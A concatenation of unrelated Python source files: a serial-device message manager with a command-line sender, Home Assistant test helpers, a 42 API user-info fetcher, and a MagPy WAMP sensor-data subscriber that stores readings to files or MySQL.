"""Context manager to listen for certain message types."""
# Ensure connected and running
is_connected = self.is_connected()
is_running = self.is_running()
if not is_connected:
self.connect()
if not is_running:
self.start()
# Start listening for responses
for msg_type in msg_types:
if msg_type is not None:
self.response_types.append(msg_type)
try:
# Yield with block
yield
finally:
# Remove message types
for msg_type in msg_types:
try:
self.response_types.remove(msg_type)
except (KeyError, IndexError, Exception):
pass
# If connected and/or started then stop and/or disconnect
if not is_running:
self.stop()
if not is_connected:
self.disconnect()
@classmethod
def listener(cls, *msg_types, attr=None, func=None):
"""Decorator to have a function run with listen_for_messages"""
if func is None:
def decorator(f):
return cls.listener(*msg_types, func=f)
return decorator
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
msg_mngr = self
if attr is not None:
msg_mngr = getattr(self, msg_mngr)
with msg_mngr.listen_for_messages(*msg_types):
return func(self, *args, **kwargs)
return wrapper
def has_msg_type(self, msg_type=None):
"""Return True if the given msg_type is saved in the ack_list. If None is given return True if any
message is in the ack_list.
"""
with self.ack_lock:
return (msg_type is None and len(self.ack_list) > 0) or \
any(isinstance(msg, msg_type) for msg in self.ack_list)
def wait_for_response(self, timeout, msg_type=None):
"""Wait for a response message and return True if a message was received.
Args:
timeout (float/int): Number of seconds to wait for a message.
msg_type (Message/object)[None]: Message type class to wait for.
Returns:
success (bool): True if a message was received within the timeout.
"""
start = time.time()
while (time.time() - start) < timeout and not self.has_msg_type(msg_type):
time.sleep(self.wait_delay)
return self.has_msg_type(msg_type)
def send_wait(self, msg, timeout=0, msg_type=None, attempts=3, print_msg=True, print_recv=None):
"""Send a message and wait for a response.
Args:
msg (Message): Message to convert to bytes and send.
timeout (float/int): Number of seconds to wait for a message on each attempt.
msg_type (Message/object)[None]: Message type class to wait for.
attempts (int)[3]: Number of attempts to send the message and wait for the response.
print_msg (bool)[True]: If True print out that you are sending the message.
print_recv (bool)[print_msg]: If True print all received messages.
Returns:
ack_list (list): List of received messages.
"""
if print_recv is None:
print_recv = print_msg
with self.listen_for_messages(msg_type):
trials = 0
success = False
pout = 'Sending: {}'.format(msg)
while (trials < attempts) and not success:
if print_msg:
print(pout)
self.write(msg)
success = self.wait_for_response(timeout, msg_type=msg_type)
pout = 'Sending (Retry): {}'.format(msg)
trials += 1
if not success and timeout > 0:
raise TimeoutError('Attempts sending {} failed!'.format(msg))
# Clear and return messages
with self.ack_lock:
msgs = list(pop_messages(self.ack_list, msg_type))
self.ack_list.clear()
if print_recv:
for msg in msgs:
print('Received:', msg)
return msgs
send_wait_for_response = send_wait
def is_running(self):
"""Return if the reading thread is running."""
return self._process is not None and self._process.is_running()
def start(self):
"""Start reading and parsing the connection."""
if self._process is None:
self._process = continuous_threading.PausableThread(target=self.read_and_parse)
self.flush()
self._process.start()
# Wait for the thread to start reading
time.sleep(0.01)
return self
def stop(self):
"""Stop reading and parsing the connection."""
try:
self._process.stop()
except (AttributeError, Exception):
pass
return self
def close(self):
"""Close the process."""
self.disconnect()
try:
self._process.close()
except (AttributeError, Exception):
pass
self._process = None
return self
def __enter__(self):
"""Enter the 'with' context manager."""
self._in_enter = True
if not self.is_connected():
try:
self.connect()
self._enter_connected = True
except Exception as err:
print('Warning: Could not connect! {}'.format(err), file=sys.stderr)
if not self.is_running():
self.start()
self._enter_started = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Exit the 'with' context manager."""
self._in_enter = False
if self._enter_started:
self._enter_started = False
self.stop()
if self._enter_connected:
self._enter_connected = False
self.disconnect()
return exc_type is None
def send_msg(com, baudrate, cmd_id, timeout=1, attempts=1, **kwargs):
"""Send a command to the device.
Args:
com (str): Com port to connect to
baudrate (int): Baudrate to connect with.
cmd_id (int/str/Message): Command identifier to send.
timeout (float/int)[1]: Timeout to wait for the response.
attempts (int)[1]: Number of times to send the message expecting a response.
**kwargs (dict): Dictionary of Command keyword arguments (variable names with values).
"""
cmd_type = Parser.lookup(cmd_id)
if cmd_type is None:
raise ValueError('Invalid cmd_id given! No matching command for {}'.format(cmd_id))
cmd = cmd_type(**kwargs)
with CommunicationManager(com=com, baudrate=baudrate) as ser:
try:
msgs = ser.send_wait(cmd, timeout=timeout, msg_type=cmd.RESPONSE_TYPE, attempts=attempts)
except TimeoutError:
# Timeout error with no response for the expected type.
with ser.ack_lock:
msgs = [ser.ack_list.pop(0) for _ in range(len(ser.ack_list))]
for msg in msgs:
print('Received {}:'.format(msg.NAME))
for field, value in msg.fields().items():
print('\t{} = {}'.format(field, value))
print()
main = send_msg
def cli_to_kwargs(cli_args):
"""Convert command line arguments to a dictionary.
Args:
cli_args (list): List of command line arguments ["--address", "1", "--value", 2]
"""
return {get_name(cli_args[i]): get_value(cli_args[i+1]) for i in range(0, len(cli_args), 2)}
def get_name(name):
"""Get a command line argument name by removing all '-'."""
return str(name).replace('-', '')
def get_value(value):
"""Convert the given string value to a proper python object.
ast.literal_eval may work better.
"""
try:
if str(value).startswith('0x'):
return int(value, 16) # Was given hex. This allows "0x12" = 18
else:
return int(value)
except (ValueError, TypeError, Exception):
try:
return float(value)
except (ValueError, TypeError, Exception):
return value
if __name__ == '__main__':
import argparse
P = argparse.ArgumentParser(description='Send a command to the device.')
P.add_argument('com', type=str, help='Com port to connect to.')
P.add_argument('baudrate', type=int, help='Baudrate to connect with.')
P.add_argument('cmd_id', type=str,
help='Command ID as the string NAME or integer ID '
'(Example: "Command Status" String, 0x12 Hex, or 18 Dec).')
P.add_argument('--timeout', type=float, default=1, help='Timeout to wait for the response.')
P.add_argument('--attempts', type=int, default=1, help='Number of times to send the message expecting a response.')
ARGS, REMAINDER = P.parse_known_args()
main(ARGS.com, ARGS.baudrate, get_value(ARGS.cmd_id), timeout=ARGS.timeout, attempts=ARGS.attempts,
**cli_to_kwargs(REMAINDER))
|
common.py | """Test the helper method for writing tests."""
import asyncio
import os
import sys
from datetime import timedelta
from unittest.mock import patch, MagicMock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from aiohttp import web
from homeassistant import core as ha, loader
from homeassistant.setup import setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers.dispatcher import async_dispatcher_send
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.helpers.restore_state import DATA_RESTORE_CACHE
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import sun, mqtt, recorder
from homeassistant.components.http.auth import auth_middleware
from homeassistant.components.http.const import (
KEY_USE_X_FORWARDED_FOR, KEY_BANS_ENABLED, KEY_TRUSTED_NETWORKS)
from homeassistant.util.async import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INST_COUNT = 0
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Helper to start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
global INST_COUNT
INST_COUNT += 1
loop._thread_ident = threading.get_ident()
hass = ha.HomeAssistant(loop)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, MagicMock):
return
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS:
yield from loop.run_in_executor(None, loader.prepare, hass)
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# 1. We only mock time during tests
# 2. We want block_till_done that is called inside stop_track_tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
global INST_COUNT
INST_COUNT -= 1
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
def mock_service(hass, domain, service):
"""Setup a fake service & return a list that logs calls to this service."""
calls = []
@asyncio.coroutine
def mock_service_log(call): # pylint: disable=unnecessary-lambda
""""Mocked service call."""
calls.append(call)
if hass.loop.__dict__.get("_thread_ident", 0) == threading.get_ident():
hass.services.async_register(domain, service, mock_service_log)
else:
hass.services.register(domain, service, mock_service_log)
return calls
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0):
"""Fire the MQTT message."""
async_dispatcher_send(
hass, mqtt.SIGNAL_MQTT_MESSAGE_RECEIVED, topic, payload, qos)
def fire_mqtt_message(hass, topic, payload, qos=0):
"""Fire the MQTT message."""
run_callback_threadsafe(
hass.loop, async_fire_mqtt_message, hass, topic, payload, qos).result()
def fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.fire(EVENT_TIME_CHANGED, {'now': time})
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def ensure_sun_risen(hass):
"""Trigger sun to rise if below horizon."""
if sun.is_on(hass):
return
fire_time_changed(hass, sun.next_rising_utc(hass) + timedelta(seconds=10))
def ensure_sun_set(hass):
"""Trigger sun to set if above horizon."""
if not sun.is_on(hass):
return
fire_time_changed(hass, sun.next_setting_utc(hass) + timedelta(seconds=10))
def load_fixture(filename):
"""Helper to load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path) as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
def mock_http_component(hass, api_password=None):
"""Mock the HTTP component."""
hass.http = MagicMock(api_password=api_password)
mock_component(hass, 'http')
hass.http.views = {}
def mock_register_view(view):
"""Store registered view."""
if isinstance(view, type):
# Instantiate the view, if needed
view = view()
hass.http.views[view.name] = view
hass.http.register_view = mock_register_view
def mock_http_component_app(hass, api_password=None):
"""Create an aiohttp.web.Application instance for testing."""
if 'http' not in hass.config.components:
mock_http_component(hass, api_password)
app = web.Application(middlewares=[auth_middleware], loop=hass.loop)
app['hass'] = hass
app[KEY_USE_X_FORWARDED_FOR] = False
app[KEY_BANS_ENABLED] = False
app[KEY_TRUSTED_NETWORKS] = []
return app
def mock_mqtt_component(hass):
"""Mock the MQTT component."""
with patch('homeassistant.components.mqtt.MQTT') as mock_mqtt:
mock_mqtt().async_connect.return_value = mock_coro(True)
setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: {
mqtt.CONF_BROKER: 'mock-broker',
}
})
return mock_mqtt
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
self._setup = setup
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if async_setup is not None:
self.async_setup = async_setup
def setup(self, hass, config):
"""Setup the component.
We always define this mock because MagicMock setups will be seen by the
executor as a coroutine, raising an exception.
"""
if self._setup is not None:
return self._setup(hass, config)
return True
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
self._setup_platform = setup_platform
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
def setup_platform(self, hass, config, add_devices, discovery_info=None):
"""Setup the platform."""
if self._setup_platform is not None:
self._setup_platform(hass, config, add_devices, discovery_info)
class MockToggleDevice(ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug('patch_yaml_files match %s', fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug('patch_yaml_files end match %s: %s', ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug('patch_yaml_files using real file: %s', fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError('File not found: {}'.format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Helper method to return a coro that returns a value."""
@asyncio.coroutine
def coro():
"""Fake coroutine."""
return return_value
return coro()
def mock_coro_func(return_value=None):
"""Helper method to return a coro that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager aroung setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug('Configuration for %s, Validated: %s, Original %s',
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
hass.data[DATA_RESTORE_CACHE] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[DATA_RESTORE_CACHE])
assert len(hass.data[DATA_RESTORE_CACHE]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
|
get_user_info.py | import requests
import json
import urllib2
import urllib
import pandas as pd
from threading import Thread
if __name__ == '__main__':
with open('appcreds.txt', 'r') as credfile:
uid, secret = credfile.read().splitlines()
r = requests.post("https://api.intra.42.fr/oauth/token", data={'grant_type': 'client_credentials', 'client_id': uid, 'client_secret': secret})
r.raise_for_status()
access_token = json.loads(r.text)['access_token']
print(access_token)
df = pd.read_csv('users_url.csv')
people = []
#Threding function to append users info to output list 'people'
def recrod_info(user_url):
#python3 implementation
#f = urllib.request.urlopen(user_url+('?access_token=%s' % (access_token)))
#python2 implementation
f = urllib2.urlopen(user_url+('?access_token=%s' % (access_token)))
people.append(json.loads(f.read()))
#Multi-thread recording with external loop reducing number of threads to not overflood API with requests
req_slower = 20
length = len(df)
for count in range(req_slower):
threads = []
print("Recording: %d%%" % int(count * 100 / req_slower))
#Multi-threading to speed-up user info gathering from API
for i in range((length * count) // req_slower, (length * (count + 1)) // req_slower):
count += 1
process = Thread(target=recrod_info, args=[df['url'][i]])
process.start()
threads.append(process)
#Join is improtant before starting another process threading batch or world will go topsy turvy
for process in threads:
process.join()
print("Recording completed")
#output as json
with open('users_info.txt', 'w') as outfile:
json.dump(people, outfile)
#output as DataFrame
#df = pd.DataFrame(pd.read_json(json.dumps(people)))
#df.to_csv('users_info.csv')
#print(pd.read_csv('users_info.csv'))
|
subscribe2client.py | from __future__ import print_function
import sys, os, struct
from twisted.python import log
try: # version > 0.8.0
from autobahn.wamp1.protocol import WampClientProtocol
except:
from autobahn.wamp import WampClientProtocol
# For converting Unicode text
import collections
# For saving
import numpy as np
import multiprocessing
# Timing
from datetime import datetime, timedelta
# Database
#import MySQLdb
# sets for removing duplicates
#TODO
"""
Some comments:
- storage of one input line requires about 400 microseconds
TODO:
secondary time column in POS1 file was added manually to data base - not available in bin file - please check that
"""
import magpy.stream as st
from magpy.database import *
from magpy.opt import cred as mpcred
from magpy.transfer import scptransfer
clientname = 'default'
s = []
o = []
marcospath = ''
IDDICT = {0:'clientname',1:'time',2:'date',3:'time',4:'time',5:'coord',
10:'f',11:'x',12:'y',13:'z',14:'df',
20:'x',21:'y',22:'z',23:'dx',24:'dy',25:'dz',
30:'t1',31:'t1',32:'t2',33:'var1',34:'t2',35:'var3',36:'x',37:'y',38:'var1',39:'f',
40:'var1',45:'str1',
50:'var1',51:'var2',
60:'var2',61:'var3',62:'var4'}
MODIDDICT = {'env': [1,30,33,34], 'ow': [1,30,33,60,61,62], 'lemi': [1,4,11,12,13,31,32,60] ,'pos1': [1,4,10,14,40], 'cs': [1,10], 'gsm': [1,10], 'kern': [1,38], 'ult': [1,32,50,51], 'lnm': [1,30,36,37,39,45], 'pal': [1,11,12,13], 'ard': [1,10,11,12,13,14,30,33,35], 'sug': [1,20,21,22,23,24,25], 'bm3': [1,35]}
UNITDICT = {'env': ['degC','percent','degC'], 'ow': ['degC','percent','V','V','V'], 'lemi': ['nT','nT','nT','degC','degC','V'] ,'pos1': ['nT','nT','index'], 'cs': ['nT'], 'cs': ['nT'], 'kern': ['g'], 'ult': ['degC','m_s','deg'], 'lnm': ['degC','mm','m','N'], 'ard': ['nT','nT','nT','nT','-','degC','percent','HPa'], 'sug': ['nT','nT','nT','-','-','-'], 'bm3': ['mBar']}
NAMEDICT = {'env': ['T','rh','Dewpoint'], 'ow': ['T','rh','VDD','VAD','VIS'], 'lemi': ['x','y','z','Ts','Te','Vol'] ,'pos1': ['f','df','errorcode'], 'cs': ['f'], 'gsm': ['f'], 'kern': ['w'], 'ult': ['T','v','Dir'], 'lnm': ['T','R','visibility','Ptotal'], 'ard': ['f','x','y','z','df','T','rh','P'],'sug': ['S1','S2','S3','Grad_S3_S1','Grad_S3_S2','Grad_S2_S1'], 'bm3': ['P']}
def sendparameter(cname,cip,marcospath,op,sid,sshc,sensorlist,owlist,pd,dbc=None):
print("Getting parameters ...")
global clientname
clientname = cname
global clientip
clientip = cip
global output # desired storage type - "file" or "db"
output = op
global stationid # Station code
stationid = sid
global sshcred # List containing credentials for scp transfer
sshcred = sshc
global o # List containing one wire information and ids
o = owlist
global s # List containing sensor information and ports
s = sensorlist
global destpath # String for storing data - used for getting new sensor data for db upload and for file saving
destpath = marcospath
global printdata # BOOL for testing purpose - prints received data to screen
printdata = pd
if output == 'db':
if not dbc:
print ('collectors owclient: for db output you need to provide the credentials as last option')
global dbcred
dbcred = dbc
print("Parameters transfered")
return
def timeToArray(timestring):
# Converts time string of format 2013-12-12T23:12:23.122324
# to an array similiat to a datetime object
try:
splittedfull = timestring.split(' ')
splittedday = splittedfull[0].split('-')
splittedsec = splittedfull[1].split('.')
splittedtime = splittedsec[0].split(':')
datearray = splittedday + splittedtime
datearray.append(splittedsec[1])
datearray = map(int,datearray)
return datearray
except:
print('collectors owclient: Error while extracting time array')
return []
def dataToFile(outputdir, sensorid, filedate, bindata, header):
# File Operations
try:
path = os.path.join(outputdir,sensorid)
# outputdir defined in main options class
if not os.path.exists(path):
os.makedirs(path)
savefile = os.path.join(path, sensorid+'_'+filedate+".bin")
if not os.path.isfile(savefile):
with open(savefile, "wb") as myfile:
myfile.write(header + "\n")
myfile.write(bindata + "\n")
else:
with open(savefile, "a") as myfile:
myfile.write(bindata + "\n")
except:
print('collectors owclient: Error while saving file')
class PubSubClient(WampClientProtocol):
"""
Class for OneWire communication
"""
def onSessionOpen(self):
print("Starting")
global clientname
global clientip
global o
global s
global destpath
global printdata
global bufferarray
global output
global module
global stationid
global dbcred
global sshcred
print("Starting " + clientname + " session")
# TODO Make all the necessary parameters variable
# Basic definitions to change
self.stationid = stationid
self.output = output
self.sensorid = ''
self.sensortype = ''
self.sensorgroup = ''
self.bufferarray = []
self.savedirectly = True
self.module = ''
self.typ = ''
self.count = 0
#self.mpjobs = [] # multiprocessing jobs
#self.output = output # can be either 'db' or 'file', if not db, then file is used
# Open database connection
self.db = None
self.cursor = None
if not output == 'file':
print("collectors client: Connecting to DB ...")
self.db = mysql.connect(dbcred[0],dbcred[1],dbcred[2],dbcred[3] )
# prepare a cursor object using cursor() method
self.cursor = self.db.cursor()
print("collectors client: ... DB successfully connected ")
# Initiate subscriptions
self.line = []
for row in s:
module = row[0]
print("collectors client: Starting subscription for %s" % module)
self.subscribeInst(self.db, self.cursor, clientname, module, output)
def subscribeOw(self, client, output, module, owlist):
"""
Subscribing to all Onewire Instruments
"""
self.prefix(module, "http://example.com/" + client +"/"+module+"#")
if output == 'db':
# -------------------------------------------------------
# A. Create database input
# -------------------------------------------------------
# ideal way: upload an already existing file from moon for each sensor
# check client for existing file:
for row in owlist:
subs = True
print("collectors owclient: Running for sensor", row[0])
# Try to find sensor in db:
sql = "SELECT SensorID FROM SENSORS WHERE SensorID LIKE '%s%%'" % row[0]
try:
# Execute the SQL command
self.cursor.execute(sql)
except:
print("collectors owclient: Unable to execute SENSOR sql")
try:
# Fetch all the rows in a list of lists.
results = self.cursor.fetchall()
except:
print("collectors owclient: Unable to fetch SENSOR data from DB")
results = []
# checking existing data table
try:
self.cursor.execute("SHOW TABLES LIKE '{}%'".format(sensorid))
secresults = self.cursor.fetchall()
except:
secresults = []
if len(results) < 1 and len(secresults) < 1:
# Initialize e.g. ow table
print("collectors owclient: No sensors registered so far ...")
if len(secresults) < 1:
# Initialize e.g. ow table
print("collectors owclient: No data table existing so far - Getting file from moon and uploading it")
day = datetime.strftime(datetime.utcnow(),'%Y-%m-%d')
destfile = os.path.join(destpath,'MartasFiles', row[0]+'_'+day+'.bin')
datafile = os.path.join('/srv/ws/', clientname, row[0], row[0]+'_'+day+'.bin')
try:
print("collectors owclient: Downloading data: %s" % datafile)
scptransfer(sshcred[0]+'@'+clientip+':'+datafile,destfile,sshcred[1])
stream = st.read(destfile)
print("collectors owclient: Reading with MagPy... Found: {} datapoints".format(stream.length()[0]))
stream.header['StationID'] = self.stationid
stream.header['SensorModule'] = 'OW'
stream.header['SensorType'] = row[1]
if not row[2] == 'typus':
stream.header['SensorGroup'] = row[2]
if not row[3] == 'location':
stream.header['DataLocationReference'] = row[3]
if not row[4] == 'info':
stream.header['SensorDescription'] = row[4]
if not len(stream.ndarray[0]) > 0:
stream = stream.linestruct2ndarray()
stream2db(self.db,stream)
print("collectors owclient: Stream uploaded successfully")
except:
print("collectors owclient: Could not upload data to the data base - subscription to %s failed" % row[0])
subs = False
else:
print("collectors owclient: Found sensor(s) in DB - subscribing to the highest revision number")
if subs:
subscriptionstring = "%s:%s-value" % (module, row[0])
print("collectors owclient: Subscribing (directing to DB): ", subscriptionstring)
self.subscribe(subscriptionstring, self.onEvent)
elif output == 'file':
for row in o:
print("collectors owclient: Running for sensor", row[0])
subscriptionstring = "%s:%s-value" % (module, row[0])
print("collectors owclient: Subscribing (directing to file): ", subscriptionstring)
self.subscribe(subscriptionstring, self.onEvent)
def subscribeSensor(self,client,output,module,sensorshort,sensorid):
"""
Subscribing to Sensors:
principally any subscrition is possible if the subscription string is suppported by the moons protocols
"""
self.prefix(module, "http://example.com/" + client +"/"+module+"#")
if output == 'db':
# -------------------------------------------------------
# 1. Get available Sensors - read sensors.txt
# -------------------------------------------------------
# Try to find sensor in db:
sql = "SELECT SensorID FROM SENSORS WHERE SensorID LIKE '%s%%'" % sensorid
try:
# Execute the SQL command
self.cursor.execute(sql)
except:
print("collectors client: Unable to execute SENSOR sql")
try:
# Fetch all the rows in a list of lists.
results = self.cursor.fetchall()
except:
print("collectors client: Unable to fetch SENSOR data from DB")
results = []
# checking existing data table
try:
self.cursor.execute("SHOW TABLES LIKE '{}%'".format(sensorid))
secresults = self.cursor.fetchall()
except:
secresults = []
if len(results) < 1 and len(secresults) < 1:
# Initialize e.g. ow table
print("collectors client: No sensors registered so far ...")
if len(secresults) < 1:
# if not present then get a file and upload it
print("collectors client: No sensors registered so far - Getting data file from martas and uploading it using writeDB")
day = datetime.strftime(datetime.utcnow(),'%Y-%m-%d')
for exten in ['bin','asc']:
destfile = os.path.join(destpath,'MartasFiles', sensorid+'_'+day+'.'+exten)
datafile = os.path.join('/srv/ws/', clientname, sensorid, sensorid+'_'+day+'.'+exten)
print("collectors client: Downloading data: {}".format(datafile))
scptransfer(sshcred[0]+'@'+clientip+':'+datafile,destfile,sshcred[1],timeout=120)
print("collectors client: copying evetually existing data file to local directory {}".format(destfile))
try:
stream = st.read(destfile)
print("collectors client: Reading with MagPy... Found: {} datapoints".format(stream.length()[0]))
stream.header['StationID'] = self.stationid
stream.header['SensorModule'] = sensorshort
try:
stream.header['SensorRevision'] = sensorid[-4:]
except:
print("collectors client: Could not extract revision number for %s" % sensorid)
pass
try:
stream.header['SensorSerialNum'] = sensorid.split('_')[-2]
except:
print("collectors client: Could not extract serial number for %s" % sensorid)
pass
if not len(stream.ndarray[0]) > 0:
stream = stream.linestruct2ndarray()
stream2db(self.db,stream)
except:
print("collectors client: Could not upload data to the data base - subscription failed")
print(" : possible reason: no ssh key established so far?")
else:
print("collectors client: Found sensor(s) in DB - subscribing to the highest revision number")
subscriptionstring = "%s:%s-value" % (module, sensorid)
print("collectors sensor client: Subscribing: ", subscriptionstring)
self.subscribe(subscriptionstring, self.onEvent)
elif output == 'file':
for row in o:
print("collectors client: Running for sensor", sensorid)
subscriptionstring = "%s:%s-value" % (module, sensorid)
self.subscribe(subscriptionstring, self.onEvent)
def subscribeInst(self, db, cursor, client, mod, output):
"""
Main Method for Subscribing:
calls subscribeSensor and subscribeOw
"""
sensshort = mod[:3]
if sensshort in ['GSM','POS','G82']:
self.typ = 'f'
elif sensshort in ['LEM','FGE']:
self.typ = 'xyz'
elif sensshort in ['ENV']:
self.typ = 'env'
else:
self.typ = 'unknown'
if sensshort == 'G82':
module = 'cs'
elif sensshort == 'POS':
module = 'pos1'
elif sensshort == 'KER':
module = 'kern'
elif sensshort == 'LEM':
module = 'lemi'
elif sensshort == 'GP2':
module = 'sug'
elif sensshort.startswith('BM3'):
module = 'bm3'
else:
module = sensshort.lower()
self.module = module
if module == 'ow':
if not len(o) > 0:
print('collectors client: No OW sensors available')
else:
print('Subscribing all OneWire Sensors ...')
self.subscribeOw(client,output,module,o)
else:
self.subscribeSensor(client,output,module,sensshort,mod)
def convertUnicode(self, data):
# From RichieHindle
if isinstance(data, unicode):
return str(data)
elif isinstance(data, collections.Mapping):
return dict(map(self.convertUnicode, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(self.convertUnicode, data))
else:
return data
def storeDataLine(self, row, paralst,revnumber='0001'):
"""
Function which read a row coming from the subscribe command
and writes the data to a file or database
"""
